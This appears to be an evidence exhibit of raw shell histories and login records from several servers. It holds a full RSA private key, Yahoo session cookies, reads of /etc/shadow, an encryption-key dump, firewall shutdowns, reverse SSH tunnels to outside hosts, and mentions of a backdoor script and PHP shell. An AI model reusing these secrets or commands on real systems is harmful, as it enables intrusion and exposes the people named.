# Exhibit 1

## Collection of .bash_history logs from several machines.

In no particular order, some duplicates.

Also various bits of information including running processes, wtmp logs, and a few other things. T.S.

History 69.171.64.174

```
24  cd ./.ssh
25  mkdir ./.ssh
26  cd ./.ssh
27  echo "-----BEGIN RSA PRIVATE KEY-----
28  MIIEoQIBAAKCAQEA4CRMvFAQjlt5muISp8GTja2UmA/ngoWYlu2kW6tR/AC9Hq4N
29  Z/6yb5//ZVPKxCfbKbxd5PvN9j/KrQiqCfBheDxbKziDyFYx0H0fV6ttRFqK+/Jx
30  4SwErnmH/mScyFg9/5q6ToOUOfIbDQINLgq6Pec0bkcbjJ0k5WSjzL0O3X5JXU0S
31  paDIDMTk9glIJD9WOwdO88IhjcPqa8ZNUPCpFebdsnbC2TFTWj2nsySsRgsEwGhp
32  Pf5s+bMydRKgtUCT1VpmXcDf3IFupmeEckoK7X/w//O4yH1Rk9ooPkyiH+jlXlOB
33  /oPdIWUUJPkaqd7QYJP8bSfDGjBM4lvO96BHqwIBIwKCAQBM2T7heolVYTEB5xxW
34  xga0O4NnVej5jOPb+bSxtxTLbfeyv1UNtmkQVB0MzEWFFPqvOUTDiYhxr3iwWr30
35  x3HgFLGLKVHBB5wM97L5fJp91eaCRH7Q2+RZE7mZDI2GhKeK1fa71VdkUwH11NFR
36  nUcrKrLj+x9jaRP24K0wQNHlib3UgoWsaluIxy4T+iznY1Dj8JDawxQ7e7Pw/P+R
37  rSWQa2XO/APXD/tDKcJ76sd+1Ewv31qqMU4N44z4UJtcItR5cxyUGZGZE/rwWJJm
38  lrAPEyeGr9PAcBpGaiq/Cb06CqjiFNJEgF1eu4UHZpUYUi8iqRd9uIrdOv9qFbhE
39  TaLrAoGBAPvvL2iSe/xF5w27OPkltkRQ23XcYUfKH9U+JtGC5Cqp+IeCno7IMdyl
40  upWykn2Km356RZ8zw400VIjhVKpV0P42VYqnJqIKTSQyLiiw7y2HQdfhRKulwckz
41  bXZxcadYr2ym9jQfT770CE6mId0yCffCPl+rLJnbkulaE10/BpY/AoGBAOPCS6Qx
42  mUDNQ5DV4UwjUhCmrjKZUolre0hZaD0P03uGtRfpeSjdu4SF8/AXJWje2agP11bv
43  KxFyMaO/fYaStKnndR2xT6p+ZK6MjFtreLE6RjsrLjjcHzu9twp0/pLd75nOoJNC
44  Ew3ZDywpQV/w5SR5PcLooOmOsU/oM8LxYeuVAoGBAKzBRRSBtBqzlx9bz0uuM9cS
45  36FGqRtIxV8GC/1hEXxXS1WbZWk40bvfW19V4MsdN2yrnXR7REORmQ1nT//F0SNY
46  dSvgVQFmJkS0sfAETDx6AUOTJ8YohOG83ViITe8YPcbY41bw5jnL6HBx61XZK2gQ
47  KsVCLTZNbA26G+grN7d7AoGABqAzXmE7zwSdKRdtbh/IxkJUnDvXodUen3viLEmD
48  +it8h/UO9peVmCPOQWpT/7yy3Jn64RUU6zd3MkcRFXp1AhFWJF1v1nfnwn7H1KHq
49  KjI/XpFQ9wvUp/0Pw0Aj4O90YKYwvI3OvZVQgyn7LpmT3oQIDjZ6CwrLJs/eoIPf
50  GqcCgYAbO2fQ8TW7pQbXbqgwAh4QrJrxa6CuRrzPHQDrMCet+Ac5CG6Q2hjBKQXI
51  lxYxm2hm+bCZf6Fn8yyIaCmHojwlfgvJ2oGBiXZTwoO63yFZIJxgG7zttGDpPniw
52  72M/NxBbsW7G4w3QY7xjWXeQ9Ffb/bSRfhqBEfCm0qrdckTYtg==
53  -----END RSA PRIVATE KEY-----
54  " > ./id_rsa
55  chmod 400 ./id_rsa
56  ssh -i ./id_rsa -L 17000:0.0.0.0:17051 admin@66.165.231.123
57  ssh -i ./id_rsa -L 17000:0.0.0.0:17603 admin@66.165.231.123
58  exit
59  ssh -i ./id_rsa -D 17000 admin@66.165.231.123
60  sudo -i
61  exit
62  exit
63  ssh -v admin@69.171.64.1
64  exit
65  ls -la
66  cd ./.ssh
67  ls
68  cat known_hosts
```

69  cd ..

History 66.165.231.123


30  ls maze/
31  head query.csv
32  cd /var/log/mysql
33  ls
34  ll
35  chown mysql.mysql mysql.log
36  service mysqld restart
37  tail -F mysql.log
38  vim /etc/my.cnf
39  service mysqld restart
40  mysqladmin -uroot -p flush=logs
41  mysqladmin -uroot -p flush-logs
42  ls
43  ll
44  ls /var/lib/mysql/
45  mysql -uroot -p
46  exit
47  vim /var/lib/denyhosts/hosts
48  sudo service denyhosts stop
49  vim /var/lib/denyhosts/hosts
50  vim /var/lib/denyhosts/hosts-restricted
51  vim /var/lib/denyhosts/hosts-root
52  vim /var/lib/denyhosts/hosts-valid
53  vim /var/lib/denyhosts/users-hosts
54  vim /var/lib/denyhosts/allowed-hosts
55  service start denyhosts
56  service denyhosts start
57  vim /etc/hosts.deny
58  exit
59  cd /var/lib/denyhosts/
60  ll
61  vim allowed-hosts
62  ll
63  vim hosts-restricted
64  l
65  ll
66  service denyhosts start
67  exit
68  cd /etc/sysconfig/network-scripts/
69  ls
70  cat ifcfg-eth1
71  ifup ifcfg-eth1
72  ip link
73  cd /etc/sysconfig/network-scripts/
74  ls
75  vi ifcfg-eth0
76  ifup ifcfg-eth1
77  cat ifcfg-eth1

```
78  /sbin/service network restart
79  cd /etc/sysconfig/network-scripts/
80  ifup ifcfg-eth1
81  ip addr show
82  ping 10.16.32.1
83  ls
84  /sbin/service network restart
85  ip addr add 162.250.124.211/32 dev eth0
86  nc -v -s162.250.124.211 smtp.gmail.com
87  nc -v -s162.250.124.211 smtp.gmail.com 25
88  ifup ifcfg-snowcapdns
89  cat ifcfg-snowcapdns
90  ping 10.1.30.2
91  ip addr show
92  nc -v 162.250.124.211/32 smtp.mail.yahoo.com 25
93  nc -v 162.250.124.211 smtp.mail.yahoo.com 25
94  nc -v 162.250.124.211 smtp.mail.yahoo.com 265
95  nc -v -s162.250.124.211 smtp.mail.yahoo.com 25
96  ip addr show
97  route -n
98  service firewalld stop
99  service iptables stop
100 nc -v -s162.250.124.211 smtp.mail.yahoo.com 25
101 ls
102 ifdown ifcfg-snowcapdns
103 cat ifcfg-snowcapdns
104 ip addr show
105 ls
106 ip addr del 162.250.124.211/32 dev eth0
107 ls
108 ip ro
109 ls
110 ifdown ifcfg-snowcapdns
111 rm ifcfg-snowcapdns
112 ls
113 exit
114 cd /etc/sysconfig/network-scripts/
115 ls
116 vi ifcfg-eth1
117 ifup ifcfg-eth0
118 ifdown ifcfg-eth1
119 ifup ifcfg-eth0
120 cat /etc/sysctl.conf
121 ip addr show
122 route -n
123 vi ifcfg-eth1
124 ifup ifcfg-eth0
125 route -n
126 exit
127 cd /etc/sysconfig/network-scripts/
128 ls
129 ifdown ifcfg-snowcapdns
130 vi ro
```

```
131  ip ro
132  ls
133  cat ifcfg-eth0
134  service iptables stop
135  ls
136  ip link
137  ip link show
138  ip addr show
139  ls
140  vi ifcfg-eth1
141  ifup ifcfg-eth0
142  rm ro
143  ls
144  ifup ifcfg-snowcapdns
145  cat ifcfg-eth0
146  cat ifcfg-eth1
147  vi ifcfg-eth1
148  tcpdump --help
149  tcpdump -XX
150  tcpdump -XX port 30000
151  tcpdump -XX -vv port 30000
152  cat /home/admin/.ssh/authorized_keys
153  cat /home/admin/.ssh/id_rsa.pub
154  exit
155  cat ./.bash_history
156  nc -vvvv 69.171.64.139 56996
157  cd /root
158  ls -la
159  cd cert.bak
160  ls
161  ls -la
162  cd ..
163  cat ./.mysql_history
164  cat ./.bash_history
165  ls -la
166  cd /var
167  ls
168  cd /
169  ls -la
170  cd /home
171  ls
172  cd images
173  ls
174  cd snapshit
175  ls
176  ls -la
177  cd ..
178  ls
179  cd ..
180  ls
181  cd tunnel
182  ls
183  ls -la
```

```
184 cat ./.bash_history
185 who
186 ls
187 cd ..
188 ls
189 cat /etc/shadow
190 ls
191 cd steve
192 ls
193 cd ..
194 cd tunnel
195 ls -la
196 cd ./.ssh
197 ls
198 cat known_hosts
199 ssh -i "/home/tunnel/.ssh/id_rsa" tunnel@66.165.231.50
200 cd /root
201 ls
202 ls -la
203 cat ./somefile
204 ssh admin@66.165.231.50
205 ls
206 cd /home
207 ls
208 cd images
209 ls
210 cd /home/tunnel
211 ls
212 ls -la
213 cd ./.ssh
214 ls
215 nautilus
216 exit
217 nautilus
218 tcpdump -q
219 who
220 ssh -v admin@159.118.139.12
221 ssh -v admin@66.165.247.21
222 ls -la
223 mysql -uroot -p
224 mysql -uroot
225 cd /etc
226 ls
227 cat ./my.cnf
228 cd /home/admin
229 ls
230 ls -la
231 cd mnt
232 ls
233 cd ..
234 mount -a
235 mount
236 cd Dropbox
```

```
237  ls
238  cd /root
239  ls -la
240  cd /home/admin/Dropbox
241  ls
242  ls -la
243  cd RVR_INTEL
244  ls
245  ls -la
246  head -50 mac_fuckery.txt
247  cat bot-guard-protection-b64.txt
248  cat rsa2.key
249  cat mac-me.txt
250  ls
251  ls -la
252  cd ..
253  ls
254  cd RVR_INTEL
255  cd ..
256  ls -la
257  cd RVR_INTEL
258  ls
259  cd ..
260  ls -la
261  cd RVR_INTEL
262  ls
263  cd Mac_Me_iCloud/
264  ls -la
265  cd ..
266  ls
267  cd ..
268  ls
269  cd mailing
270  ls
271  ls -la
272  cd ..
273  ls
274  cd tmp
275  ls
276  cd ..
277  ls
278  netstat -l
279  netstat
280  tcpdump
281  cd usr
282  cd /
283  cd usr
284  ls
285  cd local
286  ls
287  cd share
288  ls
289  cd info
```

```
290  ls
291  cd ..
292  cd lib
293  ls
294  cd ..
295  cd lib
296  ls
297  cd ..
298  cd etc
299  ls
300  cd ..
301  ls
302  cd src
303  ls
304  cd ..
305  ls
306  cd src
307  ls
308  cd ..
309  cd tmp
310  ls
311  cd ..
312  ls
313  cd /var
314  ls
315  cd local
316  ls
317  cd ..
318  cd www
319  ls
320  cd /
321  ls
322  cd home
323  ls
324  cd /home/admin
325  ls
326  cd src
327  ls
328  cd tunnels
329  ls
330  cd ..
331  cd hackershit
332  ls
333  ls -la
334  head -50 ./casus_shell-decoded.php
335  cd ..
336  ls
337  cd /usr
338  cd local
339  cd src
340  ls
341  cd /home/admin
342  ls
```

343  cd mnt
344  ls
345  cd ..
346  cd tmp
347  ls
348  la -la
349  ls -la
350  cat ips.txt
351  ls -la
352  cd ..
353  ls -la
354  cat ./.mysql_history
355  curl

'https://smallbusiness.yahoo.com/catalogmgr/product/_module/?ysbparams=eyJhcHBpZCI6ImNhdGFsb2ctbWFuYWdlciIsImJpzemlkIjoieXMtMTQxNDE0ODMyMjY2MzM0IiwiYml6dXJsIjoiaHR0cDovL3lzLTE0MTQxNDgzMjI2NjM3NC55YWhvb3N0b3JlLmNvbnvbSIsImxhbmciOiJlbi11cyJ9&crumb=Ia1Y0v2rr.E&&action=get_products&sortby=update_time&sortorder=asc&rowsperpage=10&startrow=1&endrow=-1' -H 'Pragma: no-cache' -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36' -H 'Accept: */*' -H 'Referer: https://smallbusiness.yahoo.com/catalogmgr/product/?bizid=ys-141414832266334&ysbparams=eyJhcHBpZCI6ImNhdGFsb2ctbWFuYWdlciIsImJpzemlkIjoieXMtMTQxNDE0ODMyMjY2MzM0IiwiYml6dXJsIjoiaHR0cDovL3lzLTE0MTQxNDgzMjI2NjM3NC55YWhvb3N0b3JlLmNvbnvbSIsImxhbmciOiJlbi11cyJ9&yid=all.fishing&appid=catalog-manager&bizurl=http%253A%252F%252Fys-141414832266334.yahoostore.com&lang=en-us&timestamp=1442001878.453&signature=0b91286217608d9e3109241342630756089d4258' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: AO=u=1; YLS=v=1&p=1&n=1;
V=v=0.7&m=0&ccOptions=%7B%22show%22%3Afalse%2C%22lang%22%3A%22en%22%2C%22fontSize%22%3A24%2C%22fontName%22%3A%22Helvetica%20Neue%2CHelvetica%2CArial%2C_sans%22%2C%22fontColor%22%3A%22%23ffffff%22%2C%22fontOpacity%22%3A1%2C%22fontEffect%22%3A%22none%22%2C%22bgColor%22%3A%22%23000000%22%2C%22bgOpacity%22%3A%22A0.75%7D; DSS=ts=1431018180&cnt=3&sdts=1427424544881&sdtp=spigot-chr-gcmac;
AMCV_att1=MCAID%7C2AA9C9D7851D3067-4000012B201A3ACB; ucs=tr=1432222051494&fs=1;
YM=v=2&u=SuKlu5evhFLZE6vragJCSenS2XK_2EQKYe_JNQ--&d=&f=AAA&t=8h9YVB&s=j2Rw;
DK=v=2&p=OHwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfG1hYyBvcyB4fDEwLjLjEw;
ywandp=1000896321451%3A4224888094; fpc=1000896321451%3AZTEq1Wub%7C%7C;
s_pers=%20s_vnum%3D1441080000741%2526vn%253D1%7C1441080000741%3B%20s_nr%3D1440460369199-Repeat%7C1443052369199%3B%20s_invisit%3Dtrue%7C1440462169202%3B%20s_lv%3D1440460369204%7C1535068369204%3B%20s_lv_s%3DMore%25207%25250days%7C1440462169204%3B%20gpv_v17%3Dnet%257Catt.yahoo%257Cdesktop%7C1440462169207%3B; tos_viewed=1; HP=0; tos_accepted=1; ypcdb=754828f019b314d467f9f3e5596c5793;
tokenid=ordering31441998634824-8449987649138792750;
U=mt=ieGMxp2MhY9nP6tlqYu_weTrpH4i3uHqcohzeWIc&ux=fey8VB&un=amu33bs01s2sj; _vpx=6kVifdgn8uMn;
B=abgutrdagpf7v&b=4&d=c2Ay33NpYEJwUzhtvG0yV_cjhA_5ISko2FJbPA--&s=k1&i=I4U2pr4bFbDFP4Nvn4gg;
F=a=1qs_uzgMvSxk_G2ju88xwaC8L_aaxocyqtD0oItHRopEH1I1rdqhGB7JG_WQRgmLlHsWD_4Ui7WOu4VWdazazKRceXjZ33N4BPyGSDvyhWeWDKGEKmV3xz6Um.cZCn.EB4Q0SbLl5fOttPaEzoydfpGDYNhCH71t2EZ5&b=lIM4; PH=fn=kfUKyottRVR994SR&i=us;
SSL=v=1&s=hH8gm8fpn2fI6uAQ4JntDyxHb.fmk_BDQVAuq_HQXnKL6bEHajmyAQTGpGN541jpAYWhx9ZhFobLuXznlq0A9A--&kv=0;
T=z=a8y8VBaQaBWBpuriVomSohsNjM1MwY2TjY1MzAzNk4x&a=YAE&sk=DAAoVzxqy/Hx8r&ks=EAAzCeB6iJy0oipGDBBLRlgqA--~E&d=c2wBTVBRoUSRRYhBVEV5TkRiME1JazIBVOE7ZOUIJB7wsEKSkUIJlpCUEhGBE+PSiVBT1V3UE1NWERRTOE+X2lkAYhfY+V0WEN

356  ls -la
357  cd ./.ssh
358  ls
359  cat authorized_keys
360  cd /root
361  ls
362  ls -la
363  cd ./.ssh
364  ls

```
365  cd /
366  ls
367  cd /root
368  ls
369  ls -la
370  cat somefile
371  who
372  ls -la
373  cd /
374  ls
375  locate xr
376  cd /usr
377  ls
378  cd src
379  ls
380  cd ..
381  cd local
382  ls
383  cd src
384  ls
385  cd ..
386  cd share
387  ls
388  cd man
389  ls
390  cd /
391  ls
392  cd home
393  ls
394  cd steve
395  ls
396  cd ..
397  cd michelle
398  ls
399  ls -la
400  cd ..
401  ls -la
402  cd lost+found/
403  ls
404  ls -la
405  cd ..
406  cd images
407  ls
408  ls -la
409  cd /root
410  ls
411  cd ./.ssh
412  ls
413  cat known_hosts
414  ssh admin@66.165.231.238
415  ssh -v admin@66.165.231.50
416  firefox
417  google-chrome
```

```
418 tor
419 cd /sbin
420 ls
421 cryptsetup
422 cryptsetup --usage
423 ssh admin@66.165.231.50
424 ls
425 ./mount.ntfs-3g -a
426 ./mount.ntfs-3g /dev/sda2 /mnt
427 ./mount.ntfs-3g /dev/sda1 /mnt
428 ./mount.ntfs-3g /dev/sda /mnt
429 ./mount.ntfs-3g /dev/sr0 /mnt
430 ls /dev
431 ./mount.ntfs-3g /dev/sdb /mnt
432 ./mount.ntfs-3g /dev/sdb1 /mnt
433 ./mount.ntfs-3g /dev/sdb2 /mnt
434 ./mount.ntfs-3g /dev/sdb1 /mnt
435 fuser
436 fuser -c
437 fuser -l
438 fuser -c /dev/sdb1
439 fuser /dev/sdb1
440 fuser /dev/sdb2
441 fuser /dev/sdb
442 fuser -m /dev/sdb
443 fuser -m /dev/sdb2
444 fuser -m /dev/sdb1
445 fuser 80
446 fuser -v -m /dev/sdb1
447 fuser -v -k /dev/sdb1
448 ./mount.ntfs-3g /dev/sdb1 /mnt
449 mount /dev/sdb1 /mnt
450 cd /mnt
451 ls
452 umount /mnt
453 cd ..
454 umount /mnt
455 mount /dev/sdb /mnt
456 mount.ntfs-3g /dev/sdb /mnt
457 mount.ntfs-3g /dev/sdb2 /mnt
458 mount /dev/sdb2 /mnt
459 lv
460 lvm
461 sysroot /dev/root
462 lvm
463 ls -la
464 cd mnt
465 ls
466 cd ..
467 cd /
468 ls
469 cd tmp
470 ls
```

```
471  ls -la
472  cat binarylogs.sql
473  locate xr
474  find xr
475  cd /usr
476  ls
477  cd local
478  ls
479  cd src
480  ls
481  cd ..
482  ls
483  cd etc
484  ls
485  cd sbin
486  ls
487  cd ..
488  cd sbin
489  ls
490  cd ..
491  cd ..
492  cd /
493  cryptmount
494  cm
495  cd /root
496  ls
497  cd /admin
498  cd /home
499  ls
500  cd admin
501  cat ./.bash_history
502  ssh admin@return2school.net
503  cat ./.bash_history
504  ssh admin@66.165.231.54
505  ssh admin@66.165.231.41
506  ls
507  cd /root
508  ls
509  ls -la
510  locate
511  proctor
512  ssh -v admin@c21hand.com
513  ssh -v admin@107.158.36.69
514  proctor
515  cd /home
516  ls
517  cd admin
518  ls
519  cd Dropbox
520  ls
521  cd bin
522  ls
523  cd ..
```

```
524  proctor
525  cd /
526  ls
527  locate proctor
528  cd bin
529  ls
530  cd /etc
531  ls
532  cat crypttab
533  cm
534  cmtab
535  ls
536  cd /sbin
537  ls
538  ./cryptsetup
539  ./cryptsetup --dump-master-key
540  ls
541  cd /usr
542  ls
543  cd bin
544  ls
545  ls
546  cd ..
547  ls
548  cd local
549  ls
550  cd bin
551  ls
552  cd ..
553  ls
554  cd src
555  ls
556  cd ..
557  cd share
558  ls
559  cd applications
560  ls
561  cd ..
562  cd doc
563  ls
564  ls -la
565  cd /
566  ls
567  cd /home
568  ls
569  cd admin
570  ls
571  grep
572  grep --help
573  grep -r 'crypt' ./
574  grep -r -i 'cryptmount' ./
575  ls
576  cd Dropbox
```

```
577  ls
578  cd ..
579  cd /mnt
580  cd /home/admin
581  cd ./mnt
582  ls
583  cd ..
584  cryptmount
585  cm
586  cd tmp
587  ls
588  cd ..
589  cd web
590  ls
591  cd src
592  ls
593  cd httpd
594  ls
595  cd ..
596  cd alvin
597  ls
598  ls -la
599  cat famousquotesnow.com
600  cd ..
601  ls
602  cd pmta
603  ls
604  cd PowerMTA
605  ls
606  cd ..
607  cd ..
608  cd ..
609  cd Dropbox
610  ls
611  cd web
612  ls
613  cd ..
614  cd tmp
615  ls
616  cd ..
617  cd src
618  ls
619  cd baconbread
620  ls
621  cat iframes.xcf
622  ls
623  cd ..
624  ls
625  cd ..
626  ls
627  cd RVR_INTEL
628  ls
629  cd ..
```

```
630  ls
631  cd work_shared/
632  ls
633  cd ..
634  cd doc
635  ls
636  cd /home/admin
637  cd src
638  ls
639  cd spinprofit-sean
640  ls
641  cat init-torstack.sh
642  proctor
643  cd cryptmount/
644  ls
645  cd torstack
646  ls
647  cd ..
648  cd ..
649  ls
650  cd xr
651  ls
652  cd ..
653  ls
654  cd sean-scripts/
655  ls
656  cd ..
657  ls
658  cd cryptmount/
659  ls
660  cd ..
661  cd ..
662  ls
663  cd tools
664  ls
665  cd ..
666  ls
667  cd brian-stuff/
668  ls
669  cd ..
670  cat backdoor.sh
671  cd /etc
672  ls
673  cd ./gcrypt
674  ls
675  ls -la
676  cd ..
677  cat Trolltech.conf
678  cat statetab
679  cd /
680  ls
681  cd cgroup
682  ls
```

```
683  cd ..
684  cd run
685  cd proc
686  ls
687  ls -la cgroups
688  cd /
689  mount -a
690  mount -A
691  mount
692  cd /dev
693  ls
694  cd /home
695  ls
696  cd steve
697  ls -la
698  cat ./.bash_history
699  cd ..
700  cd michelle
701  cat ./.bash_history
702  ls
703  cd ..
704  ls
705  cd tunnel
706  ls
707  cat ./.bash_history
708  ssh -2fL 50000:localhost:4004 admin@66.165.231.50 sleep 10; nc localhost 50000
709  cd ./.ssh
710  ls
711  cd /home/tunnel
712  ls
713  cd ./.ssh
714  ls
715  cat known_hosts
716  ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" tunnel@66.165.231.50 sleep 10; nc localhost 50000
717  cat id_rsa.pub
718  echo "ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEArU6+zrvqvwLbNc4wbi4KHvtht/ZGYo67kea2DW/I8YyE/2BIT2NJIx97zhAKpJUW4X9R4lenpo0
xoJpiAhgIZhCEgmpsJ2an+lxpKrwZVDv60rMUXewBDLqpBci6Sln7G26mJu7FwLhPjdG8BbV1rRS6ICgNdLhtS8N8wYucu1nXVtjTC6E7
15Z5bSr56i7IqDoUwdmHMrsgpaMg9y/1p65rXsWQVA82qlc4LYtKq4cTX/b2dDduDeiVMsWQU+SKIp7/dTCFjJpA+DGgZ1dFPC9Dlv
TJyeT0Se+TUiUtrRGEXd/cZoYEU9Q63h7r+P0G0QB590suBjE2hqAjBcropQ== tunnel@rcmdev" > ./authorized_keys
719  ls
720  ls -la
721  service sshd restart
722  ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" tunnel@66.165.231.50 sleep 10; nc localhost 50000
723  ip addr
724  ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" admin@66.165.231.50 sleep 10; nc localhost 50000
725  ssh -2fL 50000:localhost:4004 -i "/home/tunnel/.ssh/id_rsa" admin@66.165.231.50 sleep 10; nc 66.165.231.123 50000
726  netstat
727  tcpdump
728  who
729  ip addr
730  ls -la
731  dropbox
```

732 Dropbox
733 dbox
734 ls sbin
735 cd /
736 ls -la
737 ls sbin
738 mount.ntfs-3g
739 ld /dev
740 ls /dev
741 ls -la
742 cd /dev
743 ls -la
744 cd ./root
745 ls
746 mount
747 mount /dev/sdb2 /mnt
748 mount.ntfs-3g
749 mount.ntfs-3g /dev/sdb2 /mnt
750 mount.ntfs-3g /dev/sdb /mnt
751 mount.ntfs-3g /dev/sda /mnt
752 cd /
753 la
754 cat /root/.bash_history
755 cat /root/.bash_history netstat
756 tcpdump
757 ls -la
758 cd /etc
759 ls
760 fdisk -l
761 cd /mnt
762 ls
763 cd ..
764 mount /dev/mapper/vg_rcmdev-lv_root /mnt
765 cd mnt
766 ls
767 cd ..
768 ls -la
769 ls
770 cd mnt
771 ls
772 cd ..
773 umount /mnt
774 mount /dev/sdb1 /mnt
775 cd /mnt
776 ls
777 cd ..
778 umount /mnt
779 ls
780 mount /dev/sdb /mnt
781 ls /dev
782 mount /dev/sda1 /mnt
783 cd /mnt
784 ls

```
785  cd ..
786  umount /mnt
787  mount /dev/root /mnt
788  cd /mnt
789  ls
790  cd ..
791  ls
792  umount /mnt
793  cd tmp
794  ls
795  ls dropbox_errorFlAMDL.txt
796  ls -la dropbox_errorFlAMDL.txt
797  cat dropbox_errorFlAMDL.txt
798  screen dropbox
799  screen virtualbox
800  virtualbox
801  ls -la
802  cd /
803  ls
804  cd var
805  ls
806  cd /etc
807  ls
808  cat hosts
809  ssh -v admin@66.165.231.50
810  ssh -v admin@45.32.17.115
811  ssh -v admin@206.63.224.15
812  ssh -v admin@66.165.231.51
813  ssh -v admin@45.32.187.128
814  ssh -v -p 2252 admin@swift.mxrmedia.com
815  ssh -v admin@snowcapdns.com
816  ssh -v -p 2252 admin@snowcapdns.com
817  ssh -v admin@middec.com
818  ssh -v admin@162.246.21.166
819  ssh -v admin@174.47.2.71
820  ssh -v -p 2252 admin@174.47.2.71
821  ssh -v admin@66.165.231.100
822  ssh -v -p 56996 admin@66.165.231.100
823  ssh -v -p 8082 admin@66.165.231.100
824  ssh -v -p 58998 admin@66.165.231.100
825  ssh -v admin@216.158.229.136
826  ssh -v admin@206.63.224.11
827  ssh -v admin@splunk
828  ssh -v admin@v9
829  ssh -v admin@vhost68
830  ssh -v admin@rwhois
831  ssh -v admin@vultr-dc
832  ssh -vvvvv admin@vultr-dc
833  ssh -vvvvv -p 5022 admin@vultr-dc
834  ssh -vvvvv -p 2022 admin@vultr-d
835  rdesktop vultr-d
836  ssh -vvvvv admin@janusdns.com
837  ssh -vvvvv admin@squid-ll
```

```
838  ssh -vvvvv admin@mysql3
839  ssh -vvvvv admin@elk-devel
840  ping baconbread.com
841  rwhois
842  whois
843  whois baconbread.com
844  ssh -v admin@66.206.0.9
845  ssh -v admin@66.165.231.139
846  ssh -v admin@66.165.231.41
847  who
848  who -u
849  tcpdump -q
850  ssh -v -p 2252 root@45.32.17.115
851  exit
852  cd /home
853  ls
854  cd tunnel
855  ls -la
856  cat ./.bash_history
857  ls -la
858  cd ./.ssh
859  ls
860  cat authorized_keys
861  cat ./known_hosts
862  cat ./id_rsa
863  ls
864  cat known_hosts
865  cd /
866  ls
867  ls -la
868  cat ./.rnd
869  cd /home
870  ls
871  cd tunnel
872  ls
873  ls -la
874  cat ./.esd_auth
875  cd /
876  cd /etc
877  ls
878  cat hosts
879  ssh -v admin@69.171.64.41
880  ssh -v admin@69.171.64.41
881  ls -la
882  cd unbound
883  ls
884  cat root.anchor
885  cat named.conf
886  cd named
887  ls
888  cd ..
889  cat named.conf
890  cd named
```

```
891  ls
892  cd /var/named
893  ls
894  cd slaves
895  ls
896  cd ..
897  cd data
898  ls
899  ls -la
900  cd ..
901  ls
902  cd dynamic/
903  ls
904  cat managed-keys.bind
905  mysql -uroot -p
906  mysql -uroot -p
907  mysql -uroot -p
908  cd /root
909  ls
910  cd /home
911  ls
912  cd /admin
913  ls
914  cd admin
915  ls
916  ls -la
917  ls
918  cd dkim
919  ls
920  cd spixy.com
921  ls
922  cd sprixy.com/
923  ls
924  cd st
925  cd steve
926  cd ..
927  cd steve/
928  ls
929  cd ..
930  cd ..
931  ls
932  cd ..
933  ls
934  cd images
935  ls
936  cd snapshit/
937  ls
938  cd ..
939  cd ..
940  ls
941  cd steve/
942  ls
943  ls -la
```

```
944  ls -la
945  cat ./.bash_history
946  dig -x 66.165.231.123
947  dig -x 166.88.192.100
948  ls /tmp
949  ls /tmp/orbit-tunnel/
950  ls -la /tmp/orbit-tunnel/
951  cd ..
952  ls
953  cd /sbin
954  ls
955  fdisk -l
956  cd /dev
957  ls
958  cd /mnt
959  cd ..
960  mount /dev/sdb2 /mnt
961  mount /dev/ram0 /mnt
962  lsblk
963  mount /dev/sr0 /mnt
964  mount /dev/sda /mnt
965  mount -t
966  mount -a
967  mount
968  mount /dev/sda /mnt
969  mount /dev/sr0 /mnt
970  mount -t ext4 /dev/sr0 /mnt
971  mount -t ext4 /dev/ram0 /mnt
972  dmesg | tail
973  ssh -v admin@69.171.64.41
974  ls -la
975  cd /root
976  ls
977  cd ./.ssh
978  ls
979  cat known_hosts
980  ssh -v admin@66.45.232.98
981  cat known_hosts
982  ssh -v admin@45.76.98.34
983  who
984  who -r
985  rdesktop
986  ssh admin@ known_hosts 66.165.232.130
987  ssh admin@66.165.232.130
988  cd /etc
989  ls
990  cat ./resolv.conf
991  cat gai.conf
992  cat lftp.conf
993  cat fstab
994  cat hosts
995  ssh -v admin@107.170.16.7
996  ssh -v admin@66.165.231.66
```

```
 997  ping prod
 998  ssh -v admin@prod
 999  ping production
1000  exit
1001  who
1002  screen -ls
```

66.165.231.240
```
4661 ?        Ss    0:00 ssh -X -f admin@10.16.32.69 -L 2001:10.16.32.69:22 -N
```

66.165.231.239

```
admin   pts/0      104.200.151.77  Wed Feb  1 21:16 - 21:30  (00:13)
admin   pts/0      104.200.151.25  Tue Jan 31 14:45 - 20:51  (06:05)
```

```
 436  sudo su
 437  ssh -vvv -p 5022 admin@108.61.182.72
 438  ssh -vvv admin@108.61.182.72
 439  ssh -vvv admin@45.32.17.115
 440  ssh -vvv admin@66.206.0.48
```

66.165.231.69
```
[admin@vhost32 ~]$ who
(unknown) :0       2016-06-14 15:03 (:0)
admin   pts/0     2016-10-28 10:50 (:1)
admin   pts/1     2016-09-20 10:08 (:1)
23248 ?        Ss    0:00 ssh -X -f -N -T -R 22222:localhost:22 admin@206.63.224.12
```

66.165.231.68
```
[root@vHost68 mnt]# last
admin   pts/1      66.165.231.123  Thu Feb  9 15:55  still logged in
admin   pts/1      66.165.231.123  Tue Feb  7 09:38 - 09:44  (00:06)
admin   pts/1      66.165.231.123  Mon Feb  6 20:37 - 20:42  (00:05)
admin   pts/1      66.165.231.123  Mon Feb  6 11:43 - 12:22  (00:39)
admin   pts/1      66.165.231.123  Mon Feb  6 10:38 - 10:38  (00:00)
admin   pts/0      :1              Thu Jan 26 11:49  still logged in
(unknown :0        :0              Fri Dec  9 09:21  still logged in
reboot  system boot 3.10.0-327.36.3. Fri Dec  9 09:21 - 16:03 (62+06:42)
admin   pts/0      66.165.231.121  Fri Dec  9 09:18 - 09:19  (00:01)
admin   pts/0      cpe-24-160-52-17 Fri Dec  2 07:46 - 07:47 (00:00)
(unknown :0        :0              Fri Dec  2 07:45 - 09:19 (7+01:34)
reboot  system boot 3.10.0-327.36.3. Fri Dec  2 07:45 - 09:19 (7+01:34)
admin   pts/1      cpe-24-160-52-17 Fri Dec  2 07:32 - 07:43  (00:11)
admin   pts/2      cpe-24-160-49-23 Fri Oct 28 13:02 - 22:15  (09:13)
